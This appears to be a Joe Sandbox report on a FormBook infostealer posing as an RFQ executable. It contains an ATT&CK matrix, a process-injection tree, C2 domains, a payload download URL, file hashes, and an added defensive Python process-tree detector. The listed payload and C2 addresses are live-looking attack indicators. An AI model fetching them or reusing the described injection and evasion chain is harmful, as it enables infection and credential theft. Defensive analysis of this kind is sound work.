Source: Yara match; file source: 0000000E.00000002.4104203005.0000000006D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000F.00000002.4101074559.0000000000630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000F.00000002.4103858952.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000F.00000002.4103945476.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000D.00000002.3649278175.0000000005330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000D.00000002.3649137742.00000000016B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000001.00000002.1750132612.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000001.00000002.1749816358.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000003.00000002.4104107521.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000D.00000002.3647567861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000010.00000002.4103523467.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000002.00000002.4103630939.0000000003A30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000003.00000002.4101142200.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000003.00000002.4104284280.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000005.00000002.4105348256.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe, code function 0_2_00EE6596: socket, WSAGetLastError, bind, listen, WSAGetLastError, closesocket
Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe, code function 0_2_00EE6A5A: socket, WSAGetLastError, bind, WSAGetLastError, closesocket

Both socket functions are in the dropper itself (process 0), which the behavior graph identifies as a compiled AutoIt binary; the AutoIt runtime ships its own TCP/UDP helpers, so a bind/listen pair there is static runtime code rather than evidence that this sample opens a listener. The remote-access verdict rests on the FormBook Yara matches in the injected processes, and on the C2 traffic those processes generate.
MITRE ATT&CK matrix as rendered in the report (one column per tactic; techniques shown with a leading number are the ones the report matched, the number being its hit count for that technique; unnumbered cells are the matrix's unmatched placeholders):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 11 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 14 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 4 Obfuscated Files or Information | NTDS | 127 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 12 Software Packing | LSA Secrets | 151 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 512 Process Injection | 1 Timestomp | Cached Domain Credentials | 41 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Masquerading | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 2 Valid Accounts | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 41 Virtualization/Sandbox Evasion | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 21 Access Token Manipulation | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 512 Process Injection | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking
Behavior Graph ID: 1467353; Sample: RFQ - MK FMHS.RFQ.24.101.exe; Start date: 04/07/2024; Architecture: WINDOWS; Score: 100

Analysis-wide: contacted ytw6.top, www.ytw6.top and 22 other IPs or domains. Signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); 12 other signatures.

Process tree (node numbers are those of the graph; "injected" marks a process the parent injected into rather than started):
• RFQ - MK FMHS.RFQ.24.101.exe (14), started. Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
  • svchost.exe (17), started. Signatures: Maps a DLL or memory area into another process
    • bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe (20), injected
      • RMActivate_ssp.exe (22), started. Network: 185.234.72.101 (ports 49754, 80; COMBAHTONcombahtonGmbHDE, United Kingdom). Dropped: C:\Users\user\AppData\Local\...\xl9lsbb.exe (PE32), C:\Users\user\...\VT3g2PdlLRVpwBp[1].exe (PE32). Signatures: Tries to steal Mail credentials (via file / registry access); Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; 2 other signatures
        • xl9lsbb.exe (27), started. Signatures: Machine Learning detection for dropped file; Injects a PE file into a foreign processes
          • xl9lsbb.exe (35), started. Signatures: Maps a DLL or memory area into another process
            • bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe (38), injected. Signatures: Maps a DLL or memory area into another process; Found direct / indirect Syscall (likely to bypass EDR)
              • runonce.exe (41), started. Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
                • bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe (44), injected. Network: ndhockeyprospects.com 162.241.253.174 (ports 49771, 80; UNIFIEDLAYER-AS-1US, United States); www.qmancha.com 202.95.21.152 (ports 49774, 49776, 49778; BCPL-SGBGPNETGlobalASNSG, Singapore). Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                • firefox.exe (48), started
        • bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe (30), injected. Network: www.lexiecos.top 203.161.55.102 (ports 49750, 49751, 49752; VNPT-AS-VNVNPTCorpVN, Malaysia); 7a4ca695fd164z.greycdn.net 165.154.0.120 (ports 49736, 80; INTERHOPCA, Canada); 5 other IPs or domains. Signatures: Found direct / indirect Syscall (likely to bypass EDR)
        • firefox.exe (33), started
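The chain in the behavior graph (the dropper starting svchost.exe, and runonce.exe and RMActivate_ssp.exe reached through injected stages that trace back to xl9lsbb.exe in the user's Temp directory) is a parent/child anomaly a SOC can catch without any FormBook-specific signature. The following is an added example, not part of the Joe Sandbox report and not Joe Sandbox code, that rebuilds the tree from a constructed process list and applies two rules: svchost.exe must be a child of services.exe, and a Windows binary from System32/SysWOW64 should not have an ancestor running from a user-writable directory. Node numbers and links are taken from the graph; the image paths for svchost.exe and the two benign control processes are assumed, and the injected bXQSx... stages carry no path because the report gives none.

```python
"""Added process-tree example (not part of the Joe Sandbox report). Node
numbers and parent/child links are the behavior graph's; image paths marked
'assumed' are not stated in the report."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

SYSTEM_DIRS: Tuple[str, ...] = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE: Tuple[str, ...] = ("c:\\users\\",)  # Desktop, AppData\Local\Temp, INetCache


@dataclass(frozen=True)
class Proc:
    node: int
    image: Optional[str]    # None when the report gives no image path
    parent: Optional[int]   # None for a root process


@dataclass(frozen=True)
class Anomaly:
    node: int
    rule: str
    detail: str


def name_of(path: Optional[str]) -> str:
    return "" if path is None else path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_dirs(path: Optional[str], dirs: Tuple[str, ...]) -> bool:
    return path is not None and path.lower().startswith(dirs)


def find_anomalies(procs: List[Proc]) -> List[Anomaly]:
    by_node: Dict[int, Proc] = {p.node: p for p in procs}
    out: List[Anomaly] = []
    for p in procs:
        parent = by_node.get(p.parent) if p.parent is not None else None
        parent_name = name_of(parent.image) if parent else ""
        # Rule 1: on a healthy host svchost.exe is started by services.exe only.
        if name_of(p.image) == "svchost.exe" and parent_name != "services.exe":
            out.append(Anomaly(p.node, "svchost-parent", f"parent is {parent_name or 'none'}"))
        # Rule 2: a System32/SysWOW64 image should not descend from a process that
        # runs out of a user-writable directory. The whole ancestor chain is
        # walked so an injected intermediate stage without a known path cannot
        # hide the Temp-resident origin.
        if in_dirs(p.image, SYSTEM_DIRS):
            anc = parent
            while anc is not None:
                if in_dirs(anc.image, USER_WRITABLE):
                    out.append(Anomaly(p.node, "system-binary-user-ancestor",
                                       f"ancestor node {anc.node}: {anc.image}"))
                    break
                anc = by_node.get(anc.parent) if anc.parent is not None else None
    return out


# Constructed from the behavior graph. Nodes 1 and 2 are a benign control
# (services.exe -> svchost.exe) that is not in the report.
SAMPLE_TREE = [
    Proc(1, r"C:\Windows\System32\services.exe", None),              # control, assumed
    Proc(2, r"C:\Windows\System32\svchost.exe", 1),                  # control, assumed
    Proc(14, r"C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe", None),
    Proc(17, r"C:\Windows\SysWOW64\svchost.exe", 14),                # path assumed
    Proc(20, None, 17),   # bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, injected; no path in report
    Proc(22, r"C:\Windows\SysWOW64\RMActivate_ssp.exe", 20),
    Proc(27, r"C:\Users\user\AppData\Local\Temp\xl9lsbb.exe", 22),
    Proc(35, r"C:\Users\user\AppData\Local\Temp\xl9lsbb.exe", 27),
    Proc(38, None, 35),   # injected stage, no path in report
    Proc(41, r"C:\Windows\SysWOW64\runonce.exe", 38),
]


def analyze_sample_tree() -> List[Anomaly]:
    return find_anomalies(SAMPLE_TREE)


if __name__ == "__main__":
    for a in analyze_sample_tree():
        print(f"node {a.node}: {a.rule} ({a.detail})")
```

Rule 2 is the one that generalises: the specific Windows binaries FormBook picks vary from run to run, but whatever it picks ends up with an ancestor in %Temp%, Desktop or INetCache, which is where the rule looks.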

Source | Detection | Scanner | Label
RFQ - MK FMHS.RFQ.24.101.exe | 37% | ReversingLabs | Win32.Trojan.Strab
RFQ - MK FMHS.RFQ.24.101.exe | 37% | Virustotal |
RFQ - MK FMHS.RFQ.24.101.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\VT3g2PdlLRVpwBp[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\xl9lsbb.exe | 100% | Joe Sandbox ML |

No Antivirus matches
Source | Detection | Scanner | Label
ytw6.top | 1% | Virustotal |
www.binpvae.lol | 1% | Virustotal |
www.hsck520.com | 5% | Virustotal |
www.lexiecos.top | 1% | Virustotal |
www.augaqfp.lol | 1% | Virustotal |
www.qmancha.com | 9% | Virustotal |
www.778981.com | 3% | Virustotal |
www.byteffederal.com | 4% | Virustotal |
www.mhtnvro.lol | 1% | Virustotal |
ndhockeyprospects.com | 2% | Virustotal |
www.ytw6.top | 1% | Virustotal |
www.webuyfontana.com | 0% | Virustotal |
www.caroinapottery.com | 1% | Virustotal |
www.jjkelker.com | 1% | Virustotal |
www.cloud-force.club | 2% | Virustotal |
www.mebutnotme.store | 0% | Virustotal |
www.a9jcpf.top | 0% | Virustotal |
www.ndhockeyprospects.com | 4% | Virustotal |
Source | Detection | Scanner | Label
http://www.fontbureau.com/designersG | 0% | URL Reputation | safe
http://www.fontbureau.com/designers/? | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.fontbureau.com/designers? | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
http://www.fontbureau.com/designers | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.fonts.com | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.apache.org/licenses/LICENSE-2.0 | 0% | URL Reputation | safe
http://www.fontbureau.com | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
http://www.fontbureau.com/designers/cabarga.htmlN | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.fontbureau.com/designers/frere-user.html | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.fontbureau.com/designers8 | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
http://www.a9jcpf.top/1kbe/ | 0% | Avira URL Cloud | safe
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js | 0% | Avira URL Cloud | safe
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js | 0% | Avira URL Cloud | safe
https://duckduckgo.com/chrome_newtab | 0% | Virustotal |
https://track.uc.cn/collect | 0% | Avira URL Cloud | safe
http://www.ytw6.top/rmef/ | 0% | Avira URL Cloud | safe
https://v-cn.vaptcha.com/v3.js | 0% | Avira URL Cloud | safe
https://hm.baidu.com/hm.js? | 0% | Avira URL Cloud | safe
http://www.qmancha.com/3in6/?b4=Beo4F/wq8RdFDjebPnHj1X0mxngmjMMrNdTrW7vwt6cBBJ1fMwEGjCkFOHv2gXsTpd06O+ghlGNN6L13Yf+5YaxQqqrS/i2qyCLFr7bAJDv3UDERmc5Em7s=&5DGDh=Hn3dOR | 0% | Avira URL Cloud | safe
https://track.uc.cn/collect | 0% | Virustotal |
https://hm.baidu.com/hm.js? | 0% | Virustotal |
http://www.ytw6.top/rmef/ | 1% | Virustotal |
https://v-cn.vaptcha.com/v3.js | 0% | Virustotal |
http://www.hsck520.com | 0% | Avira URL Cloud | safe
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js | 0% | Avira URL Cloud | safe
http://www.a9jcpf.top/1kbe/ | 0% | Virustotal |
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js | 0% | Virustotal |
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js | 0% | Virustotal |
https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css | 0% | Avira URL Cloud | safe
http://www.augaqfp.lol/l8a4/ | 0% | Avira URL Cloud | safe
https://duckduckgo.com/ac/?q= | 0% | Virustotal |
https://cdn.livechatinc.com/tracking.js | 0% | Avira URL Cloud | safe
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark | 0% | Avira URL Cloud | safe
http://ndhockeyprospects.com/nce6/?5DGDh=Hn3dOR&b4=Ed8kY/rwObA0p5m5nhu | 0% | Avira URL Cloud | safe
http://www.hsck520.com | 5% | Virustotal |
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css | 0% | Virustotal |
https://cdn.livechatinc.com/tracking.js | 0% | Virustotal |
http://www.lexiecos.top/ff8d/ | 0% | Avira URL Cloud | safe
http://www.webuyfontana.com/cns4/ | 0% | Avira URL Cloud | safe
http://www.qmancha.com/3in6/ | 0% | Avira URL Cloud | safe
http://www.lexiecos.top/ff8d/ | 1% | Virustotal |
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Virustotal |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark | 0% | Virustotal |
http://185.234.72.101/VT3g2PdlLRVpwBp.exe | 0% | Avira URL Cloud | safe
http://www.binpvae.lol/kfqo/ | 100% | Avira URL Cloud | malware
http://www.hsck520.com/2e2r/ | 0% | Avira URL Cloud | safe
http://www.qmancha.com | 0% | Avira URL Cloud | safe
http://www.webuyfontana.com/cns4/ | 0% | Virustotal |
http://www.mhtnvro.lol/il19/ | 0% | Avira URL Cloud | safe
https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js | 0% | Avira URL Cloud | safe
http://www.ndhockeyprospects.com/nce6/?5DGDh=Hn3dOR&b4=Ed8kY/rwObA0p5m5nhu+szHCUNlmSGCiAjj4r6cZewWhLhgYO7hQm/tRjsXvcwXKbbEnwnHnz6fwjIdmgc2mtcrqJn2XJ43mDBubdDmUHoysA9KOkH3v2hY= | 0% | Avira URL Cloud | safe
https://www.livechat.com/chat-with/14282961/ | 0% | Avira URL Cloud | safe
http://www.augaqfp.lol/l8a4/ | 1% | Virustotal |
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js | 0% | Virustotal |
https://www.livechat.com/?welcome | 0% | Avira URL Cloud | safe

Read the "safe" labels with care: they are reputation lookups at analysis time, and most of the short-path URLs with 0% here (for example http://www.ytw6.top/rmef/, http://www.lexiecos.top/ff8d/, http://www.qmancha.com/3in6/, http://www.a9jcpf.top/1kbe/) are on domains the behavior graph shows the injected processes contacting and the domain table below marks as malicious. The payload download http://185.234.72.101/VT3g2PdlLRVpwBp.exe, which produced the dropped VT3g2PdlLRVpwBp[1].exe, is likewise rated 0%/safe. Only http://www.binpvae.lol/kfqo/ was flagged (100%, malware). The font-vendor and search-engine URLs further up are strings found in memory and are not indicators of anything.
Name | IP | Active | Malicious | Antivirus Detection | Reputation
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
IP | Domain | Country | ASN | ASN Name | Malicious
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1467353
Start date and time: 2024-07-04 03:09:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 39s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 4
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: RFQ - MK FMHS.RFQ.24.101.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@15/9@16/10
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 61
• Number of non-executed functions: 267
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
21:10:42 | API Interceptor | 10666626x Sleep call for process: RMActivate_ssp.exe modified
21:12:31 | API Interceptor | 1x Sleep call for process: xl9lsbb.exe modified
21:13:52 | API Interceptor | 6x Sleep call for process: runonce.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: Associated Sample Name / URL | Detection | Threat Name | Context
INTERHOPCA
• HSBCscancopy-invoice778483-payment87476MT103.exe | malicious | FormBook | 165.154.0.120
• Request for Quotation for PTTEP - EPCC for SISGES Development Project 2.exe | malicious | FormBook | 165.154.0.120
• Materials specification with quantities.exe | malicious | FormBook | 165.154.0.120
• Request for Quotation - (SM Store San Mateo).exe | malicious | FormBook | 165.154.0.120
• Request for Quotation - e092876.exe | malicious | FormBook | 165.154.0.120
• RFQ - 5002172340000.exe | malicious | FormBook | 165.154.0.120
• Quotation - TB046J12LCO2 Project Mechanical.exe | malicious | FormBook | 165.154.0.120
• Sapura Engineering Sdn Bhd-RFQ.exe | malicious | FormBook | 165.154.0.120
• RFQ - 49780284109.exe | malicious | FormBook | 165.154.0.120
• ITHi-Tech Park Project.exe | malicious | FormBook | 165.154.0.120
COMBAHTONcombahtonGmbHDE
• fisher man.exe | malicious | FormBook | 185.234.72.101
• file.exe | malicious | GuLoader, Remcos | 194.59.30.244
• MUdeeReQ5R.exe | malicious | FormBook | 185.234.72.101
• Att00173994.exe | malicious | FormBook | 185.234.72.101
• https://zondahome.ncg.bio | malicious | HTMLPhisher | 45.147.231.122
• file.exe | malicious | Socks5Systemz | 194.59.31.219
• 8hd98EhtIFcYkb8.exe | malicious | FormBook | 185.234.72.101
• EFT 06282024, 013441 PM.html | malicious | Unknown | 194.59.31.132
• 209.141.57.51-x86-2024-07-01T10_22_46.elf | malicious | Gafgyt, Mirai | 152.89.244.142
• 6RjPHp1yLG.exe | malicious | Socks5Systemz | 194.59.31.219
AMAZON-02US
• https://ddec1-0-en-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fwww.cognitoforms.com%2fPaulWareConstruction%2fPaulWareConstruction&umid=78a9b273-344a-4f1a-b7d2-24e7c118b2df&auth=3a5566c60b1f4d8525fa8ab109f94675a663eb25-b5b8ec923cecbd7e3e5907f0ebdd261fbc9f6201 | malicious | HTMLPhisher | 44.228.224.212
• https://click.pstmrk.it/3s/frutilandia.com%2Ffaq%2F/gRC2/yGq2AQ/AQ/a2d2de19-7d91-4f73-a067-0dd3f808145b/1/-HKuJv7KgC | malicious | HTMLPhisher | 13.32.99.97
• https://reservation.exnetehovervs.com/apart/285z92aaza77z | malicious | Unknown | 18.245.31.129
• https://rules-pear-kft5d2.mystrikingly.com/ | malicious | Unknown | 108.157.188.101
• https://metamesklogni.webflow.io/ | malicious | Unknown | 18.245.218.90
• http://pub-2e7429ed1f544f43a4684eeceb978dbb.r2.dev/home.html | malicious | Unknown | 13.227.219.120
• https://delivery.attempt.failure.ebbs.co.za/public/MY096OineFzTCVJ56qDw3aMDByE0CDQ1 | malicious | Unknown | 13.227.219.71
• http://review-page-violation-issue-meta-center.vercel.app/ | malicious | Unknown | 76.76.21.22
• http://cacahs.fdavm.com/ | malicious | Unknown | 13.227.219.120
• http://mysterymint-s10.vercel.app/ | malicious | Unknown | 76.76.21.241
BCPL-SGBGPNETGlobalASNSG
• hOe2JrpIAE.exe | malicious | FormBook, PureLog Stealer | 14.128.41.165
• 998_popxinv_Installer.exe | malicious | XWorm | 134.122.174.169
• h8N9qpyRAPaiitu.exe | malicious | FormBook | 14.128.41.167
• sora.mpsl.elf | malicious | Mirai | 118.107.53.143
• Request for Quotation - e092876.exe | malicious | FormBook | 118.107.56.38
• Dtjgu2gHw0.elf | malicious | Mirai | 137.220.211.71
• cEEsFMSdw8.elf | malicious | Mirai | 118.107.53.144
• PTT requested quotation.exe | malicious | FormBook | 118.107.56.40
• GOoY5QBqvC.elf | malicious | Mirai, Moobot | 118.107.53.127
• https://whastappg.top/ | malicious | Unknown | 216.224.126.59
VNPT-AS-VNVNPTCorpVN
• SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | malicious | FormBook | 203.161.49.220
• SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | malicious | FormBook | 203.161.49.220
• Your file name without extension goes here.exe | malicious | FormBook | 203.161.41.207
• CMV610942X6UI.exe | malicious | FormBook | 203.161.62.199
• Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe | malicious | FormBook | 203.161.49.220
• spec 4008670601 AZTEK Order.exe | malicious | FormBook | 203.161.49.220
• AWB NO. 077-57676135055.exe | malicious | FormBook | 203.161.50.127
• file.exe | malicious | FormBook | 203.161.43.228
• fisher man.exe | malicious | FormBook | 203.161.55.124
• GJRX21GBj3.exe | malicious | FormBook | 203.161.55.102
                  No context
                  No context
                  Process:C:\Users\user\AppData\Local\Temp\xl9lsbb.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1216
                  Entropy (8bit):5.34331486778365
                  Encrypted:false
                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                  Process:C:\Windows\SysWOW64\RMActivate_ssp.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):984064
                  Entropy (8bit):7.950714934497661
                  Encrypted:false
                  SSDEEP:24576:fU8Gw/b1JQTj374gt7R7J9xCL8+cnVOdsMrxtY:fTGGJQTj374WdJ9xCL8+cVyrvY
                  MD5:C2F2B08E34FC25D172F2C3FCAB1ACFEB
